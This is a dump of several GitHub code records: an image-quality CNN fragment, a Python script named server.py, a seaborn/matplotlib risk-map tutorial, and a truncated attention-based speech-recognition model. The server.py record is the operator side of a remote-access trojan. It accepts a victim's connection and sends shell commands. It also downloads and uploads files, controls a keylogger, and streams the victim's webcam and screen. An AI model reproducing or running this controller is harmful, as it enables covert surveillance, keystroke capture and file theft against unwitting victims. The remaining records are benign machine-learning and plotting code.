network.\n \"\"\"\n N = X.size()[0]\n X1 = self.features1(X)\n H = X1.size()[2]\n W = X1.size()[3]\n assert X1.size()[1] == 512\n X2 = self.features2(X)\n H2 = X2.size()[2]\n W2 = X2.size()[3]\n assert X2.size()[1] == 128\n\n if (H != H2) | (W != W2):\n X2 = F.upsample_bilinear(X2, (H, W))\n\n X1 = X1.view(N, 512, H * W)\n X2 = X2.view(N, 128, H * W)\n X = torch.bmm(X1, torch.transpose(X2, 1, 2)) / (H * W) # Bilinear\n assert X.size() == (N, 512, 128)\n X = X.view(N, 512 * 128)\n X = torch.sqrt(X + 1e-8)\n X = torch.nn.functional.normalize(X)\n X = self.fc(X)\n assert X.size() == (N, 2)\n\n if self.config.std_modeling:\n mean = X [:, 0]\n t = X [:, 1]\n var = nn.functional.softplus(t)\n return mean, var\n else:\n return X\n","repo_name":"zwx8981/UNIQUE","sub_path":"DBCNN.py","file_name":"DBCNN.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"34"} +{"seq_id":"2559863974","text":"import socket\nimport json\nimport os\nimport struct\nimport pickle\nimport cv2\n\n#setup ip and port\nhostIP = '192.168.1.10'\nconnPort = 9981\nwebcamPort = 9998\nscreenPort = 9988\n\nsoc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsoc.bind((hostIP, connPort))\nprint('Waiting for connection...')\nsoc.listen(5) #set target\n\nconn = soc.accept()\n_target = conn[0]\nip = conn[1]\nprint(_target)\nprint(f'Connected to {str(ip)}')\n\ndef data_receive():\n data = ''\n while True:\n try:\n data = data + _target.recv(1024).decode().rstrip()\n return json.loads(data)\n except ValueError:\n continue\n\ndef download_file(fileName):\n file = open(fileName, 'wb')\n _target.settimeout(5)\n _file = _target.recv(1024)\n while _file:\n file.write(_file)\n try:\n _file = _target.recv(1024)\n except socket.timeout as e:\n break\n _target.settimeout(None)\n file.close()\n\ndef upload_file(fileName):\n file = open(fileName, 'rb')\n _target.send(file.read())\n file.close()\n\ndef cam_record():\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.bind((hostIP, webcamPort))\n sock.listen(5) #set target\n cn = sock.accept()\n target = cn[0]\n ip = cn[1]\n print(f'Making connection to {str(ip)} webcam ...')\n\n byteData = b\"\"\n payloadSize = struct.calcsize(\"Q\")\n\n while True:\n while (len(byteData)) < payloadSize:\n packet = target.recv(4*1024)\n if not packet: break\n byteData += packet\n\n packed_msg_size = byteData[:payloadSize]\n byteData = byteData[payloadSize:]\n msg_size = struct.unpack(\"Q\", packed_msg_size)[0]\n while len(byteData) < msg_size:\n byteData += target.recv(4*1024)\n frame_data = byteData[:msg_size]\n byteData = byteData[msg_size:]\n frame = pickle.loads(frame_data)\n cv2.imshow(\"Recording ...\", frame)\n key = cv2.waitKey(1)\n if key == 27:\n break\n target.close()\n cv2.destroyAllWindows()\n\ndef record_screen():\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.bind((hostIP, screenPort))\n sock.listen(5) #set target\n cn = sock.accept()\n target = cn[0]\n ip = cn[1]\n print(f'Making connection to {str(ip)} screen ...')\n\n byteData = b\"\"\n payloadSize = struct.calcsize(\"i\")\n\n while True:\n while (len(byteData)) < payloadSize:\n packet = target.recv(1024)\n if not packet: break\n byteData += packet\n \n packed_msg_size = byteData[:payloadSize]\n byteData = byteData[payloadSize:]\n msg_size = struct.unpack(\"i\", packed_msg_size)[0]\n while len(byteData) < msg_size:\n byteData += target.recv(1024)\n frame_data = byteData[:msg_size]\n byteData = byteData[msg_size:]\n frame = pickle.loads(frame_data)\n cv2.imshow(\"Recording screen...\", frame)\n key = cv2.waitKey(1)\n if key == 27:\n break\n target.close()\n cv2.destroyAllWindows()\n\n \ndef shell_communication():\n n = 0\n while True:\n cmd = input('OJAN>> ')\n data = json.dumps(cmd)\n _target.send(data.encode())\n if cmd in ('exit', 'quit'):\n break\n elif cmd == 'clear':\n os.system('clear')\n elif cmd[:3] == 'cd ':\n pass\n elif cmd[:8] == 'download':\n download_file(cmd[9:])\n elif cmd[:6] == 'upload':\n upload_file(cmd[7:])\n elif cmd == 'kaylog':\n pass\n elif cmd == 'readlogger':\n data = _target.recv(1024).decode()\n print(data)\n elif cmd == 'stoplogger':\n pass\n elif cmd == 'startcam':\n cam_record()\n elif cmd == 'screenshot':\n n += 1\n file = open(\"ss\"+str(n)+\".png\", 'wb')\n _target.settimeout(5)\n _file = _target.recv(1024)\n while _file:\n file.write(_file)\n try:\n _file = _target.recv(1024)\n except socket.timeout as e:\n break\n _target.settimeout(None)\n file.close()\n elif cmd == 'sharescreen':\n record_screen()\n else:\n result = data_receive()\n print(result)\n \nshell_communication()","repo_name":"rzpjunior/ojan","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12232512132","text":"# -*- coding: utf-8 -*-\n\"\"\"\nRISK MAPS\n\n@author: Miia Chabot\n\"\"\"\nimport seaborn as sns\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n#HEATMAP, Exercise 1.-------------------------------------------------------------\n# Create a dataset\ndf = pd.DataFrame(np.random.random((5,5)), columns=[\"a\",\"b\",\"c\",\"d\",\"e\"])\n# numpy.random.random() is one of the function for doing random sampling in numpy. \n#It returns an array of specified shape and fills it with random floats in the half-open interval [0.0, 1.0).\n\n\n# Default heatmap ------- plot first heatmap\np1 = sns.heatmap(df)\n\n\n#Exercise2-----------------------------------Measuring Correlations-------------------\n# Create a dataset\ndf = pd.DataFrame(np.random.random((100,5)), columns=[\"a\",\"b\",\"c\",\"d\",\"e\"])\n \n# Calculate correlation between each pair of variable\ncorr_matrix=df.corr() # gives me matrix 5/5\n \n# plot it\nsns.heatmap(corr_matrix, cmap='PuOr')\n# cmap='PuOr' : for color option\n#Change it \n# https://matplotlib.org/stable/gallery/color/colormap_reference.html\nsns.heatmap(corr_matrix, cmap='seismic')\n\n\n#Exercise 3.----------------------------------------------------------------------\n#HALF CORRELATION MATRIX\nimport seaborn as sns\nimport pandas as pd\nimport numpy as np\nnp.random.seed(0)\n \n# Create a dataset\ndf = pd.DataFrame(np.random.random((100,5)), columns=[\"a\",\"b\",\"c\",\"d\",\"e\"])\n\n# Calculate correlation between each pair of variable\ncorr_matrix=df.corr()\n \n# Can be great to plot only a half matrix\n# Generate a mask for the upper triangle\nmask = np.zeros_like(corr_matrix)\nmask[np.triu_indices_from(mask)] = True\n\n# Draw the heatmap with the mask\nsns.heatmap(corr_matrix, mask=mask, square=True, cmap='rainbow')\n\n\n#Exercise 4.---------------------------------------------------------------------\n \n# Create a dataset\ndf = pd.DataFrame(np.random.random((10,10)), columns=[\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\"])\n\n# plot a heatmap with annotation\nsns.heatmap(df, cmap='rainbow', annot=True, annot_kws={\"size\": 7})\n\n#Exercise 5--------------------------------------------------------------------------\n\nimport matplotlib.pyplot as plt\n\ncolumn_labels = list('ABC')\nrow_labels = list('WXYZ')\ndata = np.array([[1, 2, 3], [0, 3, 2], [1, 2, 3], [4, 3, 2]]) \nfig, axis = plt.subplots() \nheatmap = axis.pcolor(data, cmap=plt.cm.Greens)\nplt.savefig('test.png')\nplt.show() \n\n#Exercise 6 -------------------------------------------real case study------------\ncolumn_labels = list('ABC') \nrow_labels = list('WXYZ')\ndata = np.array([[1, 2, 3], [0, 3, 2], [1, 2, 3], [4, 3, 2]])\nfig, axis = plt.subplots() \nheatmap = axis.pcolor(data, cmap='rainbow') \nplt.savefig('test.png')\nplt.show() \n\n#Real-case Study: your first RISK MAP------------------------------------------\n#Step 1--------------\n#Using Diverging colormaps and selecting red, yellow, green\ncolumn_labels = list('ABC') \nrow_labels = list('WXY')\ndata = np.array([[4, 4, 3], [4, 3, 2], [3, 2, 2]])\nfig, axis = plt.subplots() \n#axis.axis(\"off\")\nheatmap = axis.pcolor(data, cmap='RdYlGn') \nplt.savefig('test.png')\nplt.show() \n\n#Making it bigger\ndata = np.array([[4, 4, 2,1], [4, 2, 1,2], [2,1, 2,0], [1, 2, 0,0]])\nfig, axis = plt.subplots()\n#axis.axis(\"off\")\nheatmap = axis.pcolor(data, cmap='RdYlGn') \nplt.savefig('test.png')\nplt.show() \n\n#choosing different colormaps\ndata = np.array([[4, 4, 2,1], [4, 2, 1,2], [2,1, 2,0], [1, 2, 0,0]])\nfig, axis = plt.subplots()\naxis.axis(\"off\")\nheatmap = axis.pcolor(data, cmap='coolwarm') \nplt.savefig('test.png')\nplt.show() \n\n#Purple_Green\ndata = np.array([[4, 4, 2,1], [4, 2, 1,2], [2,1, 2,0], [1, 2, 0,0]])\nfig, axis = plt.subplots()\naxis.axis(\"off\")\nheatmap = axis.pcolor(data, cmap='PRGn') \nplt.savefig('test.png')\nplt.show() \n\n#STep 2, the scatterplot--------------------------------\n\ny = [0.2, 0.4,0.4,2.5,1.5,1.4,1.9,0.95,1,1.3,1.6,1.92,2.7,0.5,1.6,1.8,2.2,2.7,2.5,2.3]\nx = [0.9, 0.9,2.7,0.2,0.1,0.3,0.85,1.3,1.8,1.82,1.5,1.82,1.98,2.3,2.6,2.3,2.7,2.1,0.7,0.9]\nn = [12,8,14,20,11,19,7,13,17,5,4,15,6,18,10,3,16,2,1,9]\n\nfig, ax = plt.subplots()\nax.scatter(x, y)\n\nfor i, txt in enumerate(n):\n ax.annotate(txt, (x[i], y[i]))\n \n# 3x3 RISK MAP: FINAL STEP------------------------------------------------------------ \n# Insert your scatterplot in your map\n\n#The map\ndata = np.array([[4, 4, 3], [4, 3, 2], [3, 2, 2]])\naxis.hlines([1, 2, 3], *axis.get_xlim())\naxis.vlines([1, 2, 3], *axis.get_xlim())\n\n# The scatterplot (do not place your dots on the grid)\ny = [0.2, 0.4,0.4,2.5,1.5,1.4,1.8,0.8,1.1,1.4,1.6,1.8,2.7,0.5,1.6,1.8,2.2,2.7,2.5,2.3]\nx = [0.9, 0.9,2.7,0.2,0.1,0.3,0.8,1.3,1.8,1.82,1.5,1.82,1.9,2.3,2.6,2.3,2.7,2.1,0.7,0.85]\nn = [12,8,14,20,11,19,7,13,17,5,4,15,6,18,10,3,16,2,1,9]\n\nfig, axis = plt.subplots()\n#axis.axis(\"off\")\nheatmap = axis.pcolor(data, cmap='RdYlGn') \naxis.scatter(x, y, c=\"grey\", alpha=0.5 )\naxis.hlines([1, 2, 3], *axis.get_xlim(), linestyles ='dotted',lw=1.5, color='grey')\naxis.vlines([1, 2, 3], *axis.get_xlim(),linestyles ='dotted',lw=1.5, color='grey')\n\nplt.title(\"Risk Map\",size=12, fontname=\"Calibri\")\nplt.xlabel(\"Severity\", size=10, fontname=\"Calibri\")\nplt.ylabel(\"Frequency\", size=10, fontname=\"Calibri\")\n\nfor i, txt in enumerate(n):\n axis.annotate(txt, (x[i], y[i]),xytext=(x[i]+0.03, y[i]+0.04))\n\nplt.savefig('test.png')\nplt.show() \n\n#Using Your own Excel-----------------------------------------------------------------\n\ndf = pd.read_excel(\"C:/Users/Miia CHABOT/Desktop/Data/Data_Heatmap.xlsx\")\ndata = np.array([[4, 4, 3], [4, 3, 2], [3, 2, 2]])\nn = df['N'].to_list()\nx = df['X'].to_list()\ny = df['Y'].to_list()\n\nfig, axis = plt.subplots()\naxis.axis(\"off\")\nheatmap = axis.pcolor(data, cmap='RdYlGn')\naxis.vlines([1, 2, 3], *axis.get_xlim(), linestyles ='dotted', lw=1.5, color ='grey')\naxis.hlines([1, 2, 3], *axis.get_xlim(), linestyles ='dotted', lw=1.5, color ='grey')\naxis.scatter(x, y, c='grey',alpha=0.5)\n\nfor i, txt in enumerate(n):\n axis.annotate(txt, (x[i], y[i]),xytext =(x[i]+0.03, y[i]+0.04))\n\nplt.savefig('test.png')\nplt.show() \n \n# end file\n# end end\n","repo_name":"waelbousselmi/correction_cours_python_4A_2023","sub_path":"f_Python_Course5_modif.py","file_name":"f_Python_Course5_modif.py","file_ext":"py","file_size_in_byte":6025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"45894604541","text":"import torch \nimport torch.nn.functional as F\nfrom torch.nn.utils.rnn import pack_padded_sequence\nfrom torch.nn.utils.rnn import pad_packed_sequence\nfrom torch.nn.utils.rnn import pad_sequence\nimport numpy as np\nfrom utils import cc\nfrom utils import pad_list\nfrom utils import _seq_mask\nfrom utils import _inflate\nfrom utils import _inflate_np\nfrom utils import weight_init\nfrom torch.distributions.categorical import Categorical\nimport os\nimport copy\n\ndef _get_vgg2l_odim(idim, in_channel=1, out_channel=128):\n idim = idim / in_channel\n idim = np.ceil(np.array(idim, dtype=np.float32) / 2)\n idim = np.ceil(np.array(idim, dtype=np.float32) / 2)\n return int(idim) * out_channel\n\ndef _pad_one_frame(inp):\n inp_t = inp.transpose(1, 2)\n out_t = F.pad(inp_t, (0, 1), mode='replicate')\n out = out_t.transpose(1, 2)\n return out\n\nclass VGG2L(torch.nn.Module):\n def __init__(self, in_channel=1):\n super(VGG2L, self).__init__()\n self.in_channel = in_channel\n self.conv1_1 = torch.nn.Conv2d(in_channel, 64, 3, stride=1, padding=1)\n self.conv1_2 = torch.nn.Conv2d(64, 64, 3, stride=1, padding=1)\n self.conv2_1 = torch.nn.Conv2d(64, 128, 3, stride=1, padding=1)\n self.conv2_2 = torch.nn.Conv2d(128, 128, 3, stride=1, padding=1)\n\n def conv_block(self, inp, layers):\n out = inp\n for layer in layers:\n out = F.relu(layer(out))\n out = F.max_pool2d(out, 2, stride=2, ceil_mode=True)\n return out\n\n def forward(self, xs, ilens):\n # xs = [batch_size, frames, feeature_dim]\n # ilens is a list of frame length of each utterance \n xs = torch.transpose(\n xs.view(xs.size(0), xs.size(1), self.in_channel, xs.size(2)//self.in_channel), 1, 2)\n xs = self.conv_block(xs, [self.conv1_1, self.conv1_2])\n xs = self.conv_block(xs, [self.conv2_1, self.conv2_2])\n ilens = np.array(np.ceil(np.array(ilens, dtype=np.float32) / 2), dtype=np.int64) \n ilens = np.array(np.ceil(np.array(ilens, dtype=np.float32) / 2), dtype=np.int64).tolist()\n xs = torch.transpose(xs, 1, 2)\n xs = xs.contiguous().view(xs.size(0), xs.size(1), xs.size(2) * xs.size(3))\n return xs, ilens\n\nclass pBLSTM(torch.nn.Module):\n def __init__(self, input_dim, hidden_dim, n_layers, subsample, dropout_rate):\n super(pBLSTM, self).__init__()\n layers, project_layers = [], []\n for i in range(n_layers):\n #idim = input_dim if i == 0 else hidden_dim\n idim = input_dim if i == 0 else hidden_dim\n project_dim = hidden_dim * 4 if subsample[i] > 1 else hidden_dim * 2\n\n layers.append(torch.nn.LSTM(idim, hidden_dim, num_layers=1,\n bidirectional=True, batch_first=True))\n\n project_layers.append(torch.nn.Linear(project_dim, hidden_dim))\n self.layers = torch.nn.ModuleList(layers)\n self.project_layers = torch.nn.ModuleList(project_layers)\n self.dropout_layer = torch.nn.Dropout(p=dropout_rate)\n self.subsample = subsample\n\n def forward(self, xpad, ilens):\n for i, (layer, project_layer) in enumerate(zip(self.layers, self.project_layers)):\n # pack sequence \n xs_pack = pack_padded_sequence(xpad, ilens, batch_first=True)\n ys, (_, _) = layer(xs_pack)\n ys_pad, ilens = pad_packed_sequence(ys, batch_first=True)\n ys_pad = self.dropout_layer(ys_pad)\n ilens = ilens.numpy()\n # subsampling\n sub = self.subsample[i]\n if sub > 1:\n # pad one frame\n if ys_pad.size(1) % 2 == 1:\n ys_pad = F.pad(ys_pad.transpose(1, 2), (0, 1), mode='replicate').transpose(1, 2)\n # concat two frames\n ys_pad = ys_pad.contiguous().view(ys_pad.size(0), ys_pad.size(1) // 2, ys_pad.size(2) * 2)\n ilens = [(length + 1) // sub for length in ilens]\n projected = project_layer(ys_pad)\n xpad = F.relu(projected)\n xpad = self.dropout_layer(xpad)\n # type to list of int\n ilens = np.array(ilens, dtype=np.int64).tolist()\n return xpad, ilens\n\nclass Encoder(torch.nn.Module):\n def __init__(self, input_dim, hidden_dim, n_layers, subsample, dropout_rate, in_channel=1):\n super(Encoder, self).__init__()\n #self.enc1 = VGG2L(in_channel)\n #out_channel = _get_vgg2l_odim(input_dim)\n\n self.enc2 = pBLSTM(input_dim=input_dim, hidden_dim=hidden_dim, \n n_layers=n_layers, subsample=subsample, dropout_rate=dropout_rate)\n\n def forward(self, x, ilens):\n #out, ilens = self.enc1(x, ilens)\n out, ilens = self.enc2(x, ilens)\n return out, ilens\n\nclass AttLoc(torch.nn.Module):\n def __init__(self, encoder_dim, decoder_dim, att_dim, conv_channels, conv_kernel_size, att_odim):\n super(AttLoc, self).__init__()\n self.mlp_enc = torch.nn.Linear(encoder_dim, att_dim)\n self.mlp_dec = torch.nn.Linear(decoder_dim, att_dim, bias=False)\n self.mlp_att = torch.nn.Linear(conv_channels, att_dim, bias=False)\n self.loc_conv = torch.nn.Conv2d(1, conv_channels, (1, 2 * conv_kernel_size + 1), \n padding=(0, conv_kernel_size), bias=False)\n self.gvec = torch.nn.Linear(att_dim, 1, bias=False)\n self.mlp_o = torch.nn.Linear(encoder_dim, att_odim)\n\n self.encoder_dim = encoder_dim\n self.decoder_dim = decoder_dim\n self.att_dim = att_dim\n self.att_odim = att_odim\n self.conv_channels = conv_channels\n self.enc_length = None\n self.enc_h = None\n self.pre_compute_enc_h = None\n\n def reset(self):\n self.enc_length = None\n self.enc_h = None\n self.pre_compute_enc_h = None\n\n def forward(self, enc_pad, enc_len, dec_z, att_prev, scaling=2.0):\n batch_size =enc_pad.size(0)\n if self.pre_compute_enc_h is None:\n self.enc_h = enc_pad\n self.enc_length = self.enc_h.size(1)\n self.pre_compute_enc_h = self.mlp_enc(self.enc_h)\n\n if dec_z is None:\n dec_z = enc_pad.new_zeros(batch_size, self.decoder_dim)\n else:\n dec_z = dec_z.view(batch_size, self.decoder_dim)\n\n if att_prev is None:\n # initialize attention weights to uniform\n att_prev = pad_list([self.enc_h.new(l).fill_(1.0 / l) for l in enc_len], 0)\n\n #att_prev: batch_size x frame\n att_conv = self.loc_conv(att_prev.view(batch_size, 1, 1, self.enc_length))\n # att_conv: batch_size x channel x 1 x frame -> batch_size x frame x channel\n att_conv = att_conv.squeeze(2).transpose(1, 2)\n # att_conv: batch_size x frame x channel -> batch_size x frame x att_dim\n att_conv = self.mlp_att(att_conv)\n\n # dec_z_tiled: batch_size x 1 x att_dim\n dec_z_tiled = self.mlp_dec(dec_z).view(batch_size, 1, self.att_dim)\n att_state = torch.tanh(self.pre_compute_enc_h + dec_z_tiled + att_conv)\n e = self.gvec(att_state).squeeze(2)\n # w: batch_size x frame\n w = F.softmax(scaling * e, dim=1)\n # w_expanded: batch_size x 1 x frame\n w_expanded = w.unsqueeze(1)\n #c = torch.sum(self.enc_h * w_expanded, dim=1)\n c = torch.bmm(w_expanded, self.enc_h).squeeze(1)\n c = self.mlp_o(c)\n return c, w\n\nclass MultiHeadAttLoc(torch.nn.Module):\n def __init__(self, encoder_dim, decoder_dim, att_dim, conv_channels, conv_kernel_size, heads, att_odim):\n super(MultiHeadAttLoc, self).__init__()\n self.heads = heads\n self.mlp_enc = torch.nn.ModuleList([torch.nn.Linear(encoder_dim, att_dim) for _ in range(self.heads)])\n self.mlp_dec = torch.nn.ModuleList([torch.nn.Linear(decoder_dim, att_dim, bias=False) \\\n for _ in range(self.heads)])\n self.mlp_att = torch.nn.ModuleList([torch.nn.Linear(conv_channels, att_dim, bias=False) \\\n for _ in range(self.heads)])\n self.loc_conv = torch.nn.ModuleList([torch.nn.Conv2d(\n 1, conv_channels, (1, 2 * conv_kernel_size + 1), \n padding=(0, conv_kernel_size), bias=False) for _ in range(self.heads)])\n self.gvec = torch.nn.ModuleList([torch.nn.Linear(att_dim, 1, bias=False) for _ in range(self.heads)])\n self.mlp_o = torch.nn.Linear(self.heads * encoder_dim, att_odim)\n\n self.encoder_dim = encoder_dim\n self.decoder_dim = decoder_dim\n self.att_dim = att_dim\n self.conv_channels = conv_channels\n self.enc_length = None\n self.enc_h = None\n self.pre_compute_enc_h = None\n\n def reset(self):\n self.enc_length = None\n self.enc_h = None\n self.pre_compute_enc_h = None\n\n def forward(self, enc_pad, enc_len, dec_z, att_prev, scaling=2.0):\n batch_size =enc_pad.size(0)\n if self.pre_compute_enc_h is None:\n self.enc_h = enc_pad\n self.enc_length = self.enc_h.size(1)\n self.pre_compute_enc_h = [self.mlp_enc[h](self.enc_h) for h in range(self.heads)]\n\n if dec_z is None:\n dec_z = enc_pad.new_zeros(batch_size, self.decoder_dim)\n else:\n dec_z = dec_z.view(batch_size, self.decoder_dim)\n\n # initialize attention weights to uniform\n if att_prev is None:\n att_prev = []\n for h in range(self.heads):\n att_prev += [pad_list([self.enc_h.new(l).fill_(1.0 / l) for l in enc_len], 0)]\n\n cs, ws = [], []\n for h in range(self.heads):\n #att_prev: batch_size x frame\n att_conv = self.loc_conv[h](att_prev[h].view(batch_size, 1, 1, self.enc_length))\n # att_conv: batch_size x channel x 1 x frame -> batch_size x frame x channel\n att_conv = att_conv.squeeze(2).transpose(1, 2)\n # att_conv: batch_size x frame x channel -> batch_size x frame x att_dim\n att_conv = self.mlp_att[h](att_conv)\n\n # dec_z_tiled: batch_size x 1 x att_dim\n dec_z_tiled = self.mlp_dec[h](dec_z).view(batch_size, 1, self.att_dim)\n att_state = torch.tanh(self.pre_compute_enc_h[h] + dec_z_tiled + att_conv)\n e = self.gvec[h](att_state).squeeze(2)\n # w: batch_size x frame\n w = F.softmax(scaling * e, dim=1)\n ws.append(w)\n # w_expanded: batch_size x 1 x frame\n w_expanded = w.unsqueeze(1)\n #c = torch.sum(self.enc_h * w_expanded, dim=1)\n c = torch.bmm(w_expanded, self.enc_h).squeeze(1)\n cs.append(c)\n c = self.mlp_o(torch.cat(cs, dim=1))\n return c, ws \n\n#class StateTransform(torch.nn.Module):\n# def __init__(self, idim, odim):\n# super(StateTransform, self).__init__()\n# self.fcz = torch.nn.Linear(idim, odim)\n# self.fcc = torch.nn.Linear(idim, odim)\n#\n# def forward(self, z):\n# dec_init_z = self.fcz(z)\n# dec_init_c = self.fcc(z)\n# return dec_init_z, dec_init_c\n\nclass Decoder(torch.nn.Module):\n def __init__(self, output_dim, embedding_dim, hidden_dim, attention, att_odim, \n dropout_rate, bos, eos, pad, ls_weight=0, labeldist=None):\n super(Decoder, self).__init__()\n self.bos, self.eos, self.pad = bos, eos, pad\n self.embedding = torch.nn.Embedding(output_dim, embedding_dim, padding_idx=pad)\n self.LSTMCell = torch.nn.LSTMCell(embedding_dim + att_odim, hidden_dim)\n self.output_layer = torch.nn.Linear(hidden_dim + att_odim, output_dim)\n self.dropout_layer = torch.nn.Dropout(p=dropout_rate)\n self.attention = attention\n\n self.hidden_dim = hidden_dim\n self.att_odim = att_odim\n self.dropout_rate = dropout_rate\n\n # label smoothing hyperparameters\n self.ls_weight = ls_weight\n self.labeldist = labeldist\n if labeldist is not None:\n self.vlabeldist = cc(torch.from_numpy(np.array(labeldist, dtype=np.float32)))\n\n def zero_state(self, enc_pad, dim=None):\n if not dim:\n return enc_pad.new_zeros(enc_pad.size(0), self.hidden_dim)\n else:\n return enc_pad.new_zeros(enc_pad.size(0), dim)\n\n def forward_step(self, emb, dec_z, dec_c, c, w, enc_pad, enc_len):\n cell_inp = torch.cat([emb, c], dim=-1)\n cell_inp = self.dropout_layer(cell_inp)\n dec_z, dec_c = self.LSTMCell(cell_inp, (dec_z, dec_c))\n\n # run attention module\n c, w = self.attention(enc_pad, enc_len, dec_z, w)\n output = torch.cat([dec_z, c], dim=-1)\n #output = self.dropout_layer(output)\n #output = F.dropout(output, self.dropout_rate)\n logit = self.output_layer(output)\n return logit, dec_z, dec_c, c, w\n\n def forward(self, enc_pad, enc_len, ys=None, tf_rate=1.0, max_dec_timesteps=500, \n sample=False, smooth=False, scaling=1.0, label_smoothing=True):\n batch_size = enc_pad.size(0)\n if ys is not None:\n # prepare input and output sequences\n bos = ys[0].data.new([self.bos])\n eos = ys[0].data.new([self.eos])\n ys_in = [torch.cat([bos, y], dim=0) for y in ys]\n ys_out = [torch.cat([y, eos], dim=0) for y in ys]\n pad_ys_in = pad_list(ys_in, pad_value=self.eos)\n pad_ys_out = pad_list(ys_out, pad_value=self.eos)\n # get length info\n batch_size, olength = pad_ys_out.size(0), pad_ys_out.size(1)\n # map idx to embedding\n eys = self.embedding(pad_ys_in)\n\n # initialization\n dec_c = self.zero_state(enc_pad)\n dec_z = self.zero_state(enc_pad)\n c = self.zero_state(enc_pad, dim=self.att_odim)\n\n w = None\n logits, prediction, ws = [], [], []\n # reset the attention module\n self.attention.reset()\n\n # loop for each timestep\n olength = max_dec_timesteps if not ys else olength\n for t in range(olength):\n # supervised learning: using teacher forcing\n if ys is not None:\n # teacher forcing\n tf = True if np.random.random_sample() <= tf_rate else False\n emb = eys[:, t, :] if tf or t == 0 else self.embedding(prediction[-1])\n # else, label the data with greedy\n else:\n if t == 0:\n bos = cc(torch.Tensor([self.bos for _ in range(batch_size)]).type(torch.LongTensor))\n emb = self.embedding(bos)\n else:\n # using argmax\n if not smooth:\n emb = self.embedding(prediction[-1])\n # smooth approximation of embedding\n else:\n emb = F.softmax(logit * scaling, dim=-1) @ self.embedding.weight\n logit, dec_z, dec_c, c, w = \\\n self.forward_step(emb, dec_z, dec_c, c, w, enc_pad, enc_len)\n\n ws.append(w)\n logits.append(logit)\n if not sample:\n prediction.append(torch.argmax(logit, dim=-1))\n else:\n sampled_indices = Categorical(logits=logit).sample() \n prediction.append(sampled_indices)\n\n logits = torch.stack(logits, dim=1)\n log_probs = F.log_softmax(logits, dim=2)\n prediction = torch.stack(prediction, dim=1)\n ws = torch.stack(ws, dim=1)\n\n if ys:\n ys_log_probs = torch.gather(log_probs, dim=2, index=pad_ys_out.unsqueeze(2)).squeeze(2)\n else:\n ys_log_probs = torch.gather(log_probs, dim=2, index=prediction.unsqueeze(2)).squeeze(2)\n\n # label smoothing\n if label_smoothing and self.ls_weight > 0 and self.training:\n loss_reg = torch.sum(log_probs * self.vlabeldist, dim=2)\n ys_log_probs = (1 - self.ls_weight) * ys_log_probs + self.ls_weight * loss_reg\n return logits, ys_log_probs, prediction, ws\n\n def recognize_beams(self, enc_pad, enc_len, max_dec_timesteps, topk):\n pass\n batch_size = enc_pad.size(0)\n\n # initialization\n dec_c = _inflate(self.zero_state(enc_pad), times=topk, dim=0)\n dec_z = _inflate(self.zero_state(enc_pad), times=topk, dim=0)\n c = _inflate(self.zero_state(enc_pad, dim=self.att_odim), times=topk, dim=0)\n\n w = None\n\n prediction = []\n logits, prediction, ws = [], [], []\n # reset the attention module\n self.attention.reset()\n\n # init some beam search variables\n pos_index = torch.LongTensor(range(batch_size) * topk).view(-1, 1)\n enc_pad = _inflate(enc_pad, times=k, dim=0)\n enc_len = _inflate_np(np.array(enc_len), times=k, dim=0)\n\n sequence_scores = torch.Tensor(batch_size * topk, 1)\n sequence_scores.fill_(-float('Inf'))\n sequence_scores.index_fill_(0, torch.LongTensor([i * self.k for i in range(0, batch_size)]), 0.0)\n\n # Initialize the input vector\n inp_var = torch.transpose(torch.LongTensor([[self.bos] * batch_size * self.k]), 0, 1)\n\n # Store decisions for backtracking\n stored_outputs = list()\n stored_scores = list()\n stored_predecessors = list()\n stored_emitted_symbols = list()\n stored_hidden = list()\n\n for step in range(max_dec_timesteps):\n logit, dec_z, dec_c, c, w = \\\n self.forward_step(inp_var, dec_z, dec_c, c, w, enc_pad, enc_len)\n\nclass E2E(torch.nn.Module):\n def __init__(self, input_dim, enc_hidden_dim, enc_n_layers, subsample, dropout_rate, \n dec_hidden_dim, att_dim, conv_channels, conv_kernel_size, att_odim,\n embedding_dim, output_dim, ls_weight, labeldist, \n pad=0, bos=1, eos=2):\n\n super(E2E, self).__init__()\n\n # encoder to encode acoustic features\n self.encoder = Encoder(input_dim=input_dim, hidden_dim=enc_hidden_dim, \n n_layers=enc_n_layers, subsample=subsample, dropout_rate=dropout_rate)\n\n # attention module\n self.attention = AttLoc(encoder_dim=enc_hidden_dim, \n decoder_dim=dec_hidden_dim, att_dim=att_dim, \n conv_channels=conv_channels, conv_kernel_size=conv_kernel_size, \n att_odim=att_odim)\n\n # decoder to generate words (or other units) \n self.decoder = Decoder(output_dim=output_dim, \n hidden_dim=dec_hidden_dim, \n embedding_dim=embedding_dim,\n attention=self.attention, \n dropout_rate=dropout_rate, \n att_odim=att_odim, \n ls_weight=ls_weight, \n labeldist=labeldist, \n bos=bos, \n eos=eos, \n pad=pad)\n\n def forward(self, data, ilens, ys=None, tf_rate=1.0, max_dec_timesteps=200, \n sample=False, smooth=False, scaling=1.0, label_smoothing=True):\n enc_h, enc_lens = self.encoder(data, ilens)\n logits, log_probs, prediction, ws = self.decoder(enc_h, enc_lens, ys, \n tf_rate=tf_rate, max_dec_timesteps=max_dec_timesteps, \n sample=sample, smooth=smooth, scaling=scaling, label_smoothing=label_smoothing)\n return logits, log_probs, prediction, ws\n\n def mask_and_cal_loss(self, log_probs, ys, mask=None):\n # add 1 to EOS\n if mask is None: \n seq_len = [y.size(0) + 1 for y in ys]\n mask = cc(_seq_mask(seq_len=seq_len, max_len=log_probs.size(1)))\n else:\n seq_len = [y.size(0) for y in ys]\n # divide by total length\n loss = -torch.sum(log_probs * mask) / sum(seq_len)\n return loss\n\n# like standard LM\nclass LM(torch.nn.Module):\n def __init__(self, output_dim, embedding_dim, hidden_dim, dropout_rate, n_layers,\n bos, eos, pad, ls_weight, labeldist):\n super(LM, self).__init__()\n\n self.bos, self.eos, self.pad = bos, eos, pad\n 